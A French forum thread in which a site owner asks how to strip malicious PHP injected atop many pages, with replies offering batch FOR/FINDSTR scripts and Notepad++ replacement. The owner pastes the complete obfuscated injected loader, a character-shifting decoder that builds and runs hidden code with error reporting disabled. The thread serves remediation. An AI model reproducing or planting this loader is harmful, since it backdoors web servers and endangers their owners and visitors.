Site Hacké avec injection code PHP
tchao57
Messages postés
583
Date d'inscription
Statut
Membre
Dernière intervention
-
tchao57 Messages postés 583 Date d'inscription Statut Membre Dernière intervention -
tchao57 Messages postés 583 Date d'inscription Statut Membre Dernière intervention -
Bonjour à tous,
je viens vous voir aujourd'hui car j'ai un site qui a été hacké avec de l'injection de code PHP dans les pages.
J'ai pu remarqué que beaucoup de pages PHP avaient été touchées mais pas toutes. Le code injecté se situe toujours en haut du fichier PHP avec les balises <?php et ?> et le code à l'intérieur.
Ce que je souhaiterai faire c'est de supprimer tout ce code dans toutes les pages en une seule fois. J'ai pas regardé toutes les pages mais le code semble être similaire à chaque fois.
Pour cela j'ai téléchargé l'entièreté du fichier "www" sur mon ordinateur. Je fais une recherche Windows de tous les fichiers PHP en tapant *.php, et donc je me retrouve avec tous les fichiers avec extension PHP qu'il y a dans le dossier "www".
Maintenant il faudrait que je puisse faire en sorte de supprimer tout ce qui se trouve entre les balises PHP de ces fichiers, mais sans toucher au reste du code PHP bien sur.
Je ne sais pas trop si je poste dans le bon forum, si ce n'est pas le cas désolé je changerai.
Merci d'avance pour votre aide.
je viens vous voir aujourd'hui car j'ai un site qui a été hacké avec de l'injection de code PHP dans les pages.
J'ai pu remarqué que beaucoup de pages PHP avaient été touchées mais pas toutes. Le code injecté se situe toujours en haut du fichier PHP avec les balises <?php et ?> et le code à l'intérieur.
Ce que je souhaiterai faire c'est de supprimer tout ce code dans toutes les pages en une seule fois. J'ai pas regardé toutes les pages mais le code semble être similaire à chaque fois.
Pour cela j'ai téléchargé l'entièreté du fichier "www" sur mon ordinateur. Je fais une recherche Windows de tous les fichiers PHP en tapant *.php, et donc je me retrouve avec tous les fichiers avec extension PHP qu'il y a dans le dossier "www".
Maintenant il faudrait que je puisse faire en sorte de supprimer tout ce qui se trouve entre les balises PHP de ces fichiers, mais sans toucher au reste du code PHP bien sur.
Je ne sais pas trop si je poste dans le bon forum, si ce n'est pas le cas désolé je changerai.
Merci d'avance pour votre aide.
A voir également:
- Site Hacké avec injection code PHP
- Code ascii - Guide
- Site comme coco - Accueil - Réseaux sociaux
- Site de telechargement - Accueil - Outils
- Quel site remplace coco - Accueil - Réseaux sociaux
- Site pour vendre des objets d'occasion - Guide
4 réponses
Bonjour,
Si le code rajouté est toujours en début du fichier et qu'il fait toujours le même nombre de lignes, on pourrait utiliser la commande FOR avec un paramètre skip n lignes.
Et si tous les fichiers .php ne sont pas affectés, il faudrait trouver une chaine de caractères spécifique à ce code parasite, on pourrait alors trouver les fichiers concernés avec la commande FINDSTR
Si le code rajouté est toujours en début du fichier et qu'il fait toujours le même nombre de lignes, on pourrait utiliser la commande FOR avec un paramètre skip n lignes.
Et si tous les fichiers .php ne sont pas affectés, il faudrait trouver une chaine de caractères spécifique à ce code parasite, on pourrait alors trouver les fichiers concernés avec la commande FINDSTR
On dirait qu'il n'y a pas de caractère de fin de ligne, cela peut poser problème.
Tu devrais tester dans un .cmd (à la main c'est une autre syntaxe %% devient %) sur un des fichiers concernés pour voir si cela pourrait fonctionner
et aussi pour essayer de déterminer les fichiers concernés
si tout colle, il faudra combiner les 2
Tu devrais tester dans un .cmd (à la main c'est une autre syntaxe %% devient %) sur un des fichiers concernés pour voir si cela pourrait fonctionner
@echo off cd D:\Dev\Batch\b2\dira FOR /F "skip=1 tokens=1* delims=€" %%A IN (php2.php) DO echo %%A >>newphp2.php pause
et aussi pour essayer de déterminer les fichiers concernés
@echo off cd D:\Dev\Batch\b2\dira FOR /R %%i IN (*.php) DO FINDSTR /M "eidecok" %%i && echo ok %%i pause
si tout colle, il faudra combiner les 2
Sinon, tu peux ouvrir tous les fichiers .php dans notepad++ et dans la fonction remplacer, tu colle ce que tu veux supprimer et dans remplacer tu ne met rien. Cela effacera le code en question dans tous les php à condition qu'ils soient ouverts dans NP++ et que tu remplaces avec "remplacer dans tous les documents ouverts".
Voici le code que je trouve dans mes pages PHP:
<?php $eidecok = '24- x24y7 x24- x24*<! x24- x24gps)%j>1<%j=tj{fpg)% x246Z6<.5`hA x27pd%6<pd%w6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA x27pd%6<pd2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_ x5cubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opjudovgfxpmpusut!-#j0#!/!**#t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`" x63 162 x65 141 x74 145 x5f 146 x75 156 x63 164 x69 157 x6e"; fu>?*2b%)gpf{jt)!gj!<*2bo); $qvlbdqs();}}]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:75983:48984:71,*j%!-#1]#-bubE{h%)tpqsut>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-b<**#57]38y]47]67y]37]88yt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bd%-#1GO x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<XA6|7**197-2qj%7-K)udfoopdXA x22)7gj6<*QDU##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]3#<!%w:!>!(%w:!>! x246767~6<Cw6<pd%w`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qjvt-#w#)ldbqov>*ofmy%);!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22epmqyf x27*&7-n%)utjm6< x7fw6*CW&)7gj#H#-#I#-#K#-#L#-#M#-##-#Y#-#D#-#W#-#C#-#O#-#N#*-bssbz)_x2425 x24- x24-!% x24- x24*!|! x24- x24if((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && tmw/ x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<64]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]48]SERVER[" x48 124 x54 120 x5f 125 xU,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MS%:|:**t%)m%=*h%)m%):fmjix8:56985:6197g:74985-rr.93e:5597f-s.95h%/#0#/*#npd/#)rrd/#00;qpdof.)fepdof./#@#/qp%>5h%!<*::::tjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K7(!isset($GLOBALS[" x61 156 x75 1 x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvr# x5cq%)ufttj x22)gj6x27tfs%6<*17-SFEBFI,6<*127-UVPFNJb%!**X)ufttj x22)gj!|!*nbsbq%) x24- x24]y8 x24- x24]26 x24- x24<%j,,*!| x24- x24gvodujpo! xA)qj3hopmA x273qj%6<*msvd}+;!>!} x27;!>>>!}_;gvc%}&q%7/7#@#7/7^#iubq# x5cq%FGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)3sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!id%)ftpmdR6<*id%)dfyfR t::!>! x24Ypp3)%cB%iN}#-! x24/%tmw/ x24)%c:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd193`{666~6<&w6< x7fw6*CW&)7gj6<.[A x27&6< x7f]D4]275]D:M8]Df#<%tdz>#L4]275L3]248L3P6L1M5]D2P4]D%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281;ftmbg} x7f;!osvufs}w;* x7f!>> x22!pd%)!gjppde#)tutjyf`4 x223}!+!<+{e%+*!*+fepdfe{h+{d%)73:8297f:5297e:56-xr.985:52985-t.98]K4]65]D8]86tusqpt)%z-#:#* x24- x24!>! x24/%tjw/ x24)% x24- x24y4j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>%sgj!<**2-4-bubE{h%)sutcvubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,344ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%}X x24<!%tmw!>!#]y84]275]y83]273]y76]277#<!%*#cd2bge56+99386c6f+9f5d816:+946:ce44#- x24*<!~! x24/%t2w/ x24)##-!#~<#/% x24- x24!>!fyqmpef)# x24*<!%]); if ((strstr($uas," x6d 163 x69 145")) or (strstr($uas6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH# x27rfs%6~6< x7fw6<*K)ftpmdY%)fnbozcYufhA x272qj%6<^#zsfvr# x5c275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7fmjix6<C x27&7R17,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*# x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtutjyf`x x22l:!}V;3q%}U;y]}R;2]},;osvufs} x27;mnui}&;zL1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7}R;msv}.;/#/#/},;#-#}+;%-qp%)54l} x27;%!<*#}_;#)323ldfid>}&epnbss-%rxW~!Ypp2)%zB%z>! x24/%58]24]31#-%tdz*Wsfuvso!%bss x5csboe))1/35.)1/14+9**-)1/2986+7*+opjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)! x22)!gj}1~!<2p% x7f!~!<#!%ff2-!%t::**<(<!fwbm)%tjw)# x24jw!>!#]y84]275]y83]242]48y]#>m%:|:*r%:-t%)3oftmbg!osvufs!|ftmf!~<**9.-j%56 x61"])))) { $GLOBALS[" x61 156 x75 156 x61"]=1; $uas=strtolower($_%<#462]47y]252]18y]#>q%<#762]67y]562]38y]57*W%eN+#Qi x5c1^W%c!>!%i x5c2^<!Ce#-!#]y38#-!%w:**<")));$qvlbdqs = $xppyyai("", $dzmxeu<^#Y# x5cq% x27Y%6<.msv`ftsbqA7>q%6< x7fw6* x7f_*#fubfs-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)!gj!<2epc}A;~!} x7f;!|!}{;)gj}l;33bq}k;#!>!2p%Z<^2 x5c2b%!>!2p%!*3uui#>.%!<***f x27,*e x27,*d x27,*c x27,*b x27)fex7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d! x242178}527}88:}334}472 x24<!%ff2!>!opjudovg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc x7f!|!*uyfu x27k:!ftmf!}Z23zbek!~!<b% x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>53 105 x52 137 x41 107 x45 116 x54")zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSrting(0); $dzmxeuo = implode(array_map("hvxgblk",str_split("%t7eu{66~67<&w6<*&7-#o]s]o]s]#)f::-111112)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)s," x72 166 x3a 61 x31"))) { $xppyyai = utjm!|!*5! x27!hmg%)!gj!|!*1?hmg%)!32M3]317]445]212]445]43]321]464]284]364]6]234]342],j%>j%!<**3-j%-bubE{h%)sutcw6* x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>sfopoV;hojepdoF.uofuopD#)sfebfI{*w%)kVx{**#k#).fmjgA x27doj%6< x7fw6* x7f_*#fmjgk4`{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*8]y83]256]y81]265]y72]254]y76dXk5`{66~6<&w6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA x27&6<:>1<%j:=tj{fpg)%s:*<%V,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<: x5c%j:^<!%w` x5c^>Ew:Qb:Qc:W~!%z!> x5c%j^ x24- x24tvctus)% x24- x24b!>!%yy)#}#-# x24- x24-]27]28y]#/r%/h%)n%-#+I#)q%:>:r2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-y74]275]y7:]268]y7f#<!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:f:opjudovg<~ x24<!%o:!>%w6Z6<.2`hA x27pd%6<C x27pd%6|6.%7> x2272qj%)7gj6<**2qj%)hopm3qj*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#nction hvxgblk($n){return chr(ord($n)-1);} @error_repogj<*#k#)usbut`cpV x7f x7f x7f x7f<u%V x27{ftmfV *^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<;^nbsbq% x5cSFWSFT`%}X;!sp!*#opo#>>sTrREvxNoiTCnuf_EtaerCxECalPer_Rtsrebyeqo'; $efljqgf=explode(chr((837-717)),substr($eidecok,(30712-24835),(208-174))); $krzjtyaj = $efljqgf[0]($efljqgf[(4-3)]); $ndezrekqr = $efljqgf[0]($efljqgf[(12-10)]); if (!function_exists('acfsfeo')) { function acfsfeo($gibxsim, $kckessqqs,$anjnapj) { $lfiushpz = NULL; for($ddxshxcnb=0;$ddxshxcnb<(sizeof($gibxsim)/2);$ddxshxcnb++) { $lfiushpz .= substr($kckessqqs, $gibxsim[($ddxshxcnb*2)],$gibxsim[($ddxshxcnb*2)+(3-2)]); } return $anjnapj(chr((29-20)),chr((434-342)),$lfiushpz); }; } $fitiqvxv = explode(chr((271-227)),'1124,59,1599,32,3687,69,1348,34,4368,35,2855,57,4598,39,352,66,5632,54,4459,24,4483,38,3615,21,4990,29,834,35,54,64,5520,32,4521,30,991,37,3085,63,2912,60,2972,31,723,42,869,52,5552,32,1812,21,3003,36,1863,24,1631,57,3885,55,5019,55,4921,69,1992,23,1688,33,1382,34,5095,40,2119,43,4749,70,288,64,1833,30,2334,42,5135,52,3659,28,3940,64,523,60,2603,43,4722,27,921,21,4637,35,2580,23,607,65,170,51,3558,25,4037,27,418,22,672,51,1477,25,4064,48,1502,32,4551,47,221,21,1923,69,5774,68,2753,38,4403,56,1887,36,4317,51,1721,30,4248,69,5842,35,3354,59,942,49,2057,62,3039,46,2376,46,3506,52,5686,48,4112,53,3148,67,4876,45,3251,54,4004,33,4203,45,118,52,2709,44,242,46,5428,69,583,24,5279,30,1416,25,4819,57,3756,43,3636,23,5497,23,4165,38,1077,47,5223,56,2469,53,1751,61,0,54,2791,64,2015,42,3799,33,5584,48,2646,63,3413,31,1183,52,3215,36,1534,65,1441,36,2422,47,457,66,2269,65,3305,49,2162,50,1235,51,2212,57,765,69,1286,62,4672,50,3444,62,5734,40,5074,21,2522,58,5187,36,5309,57,5366,62,1028,49,3583,32,3832,53,440,17'); $uhivuu = $krzjtyaj("",acfsfeo($fitiqvxv,$eidecok,$ndezrekqr)); $krzjtyaj=$eidecok; $uhivuu(""); $uhivuu=(582-461); $eidecok=$uhivuu-1; ?>Comment peut-on utiliser la commande FOR et skip?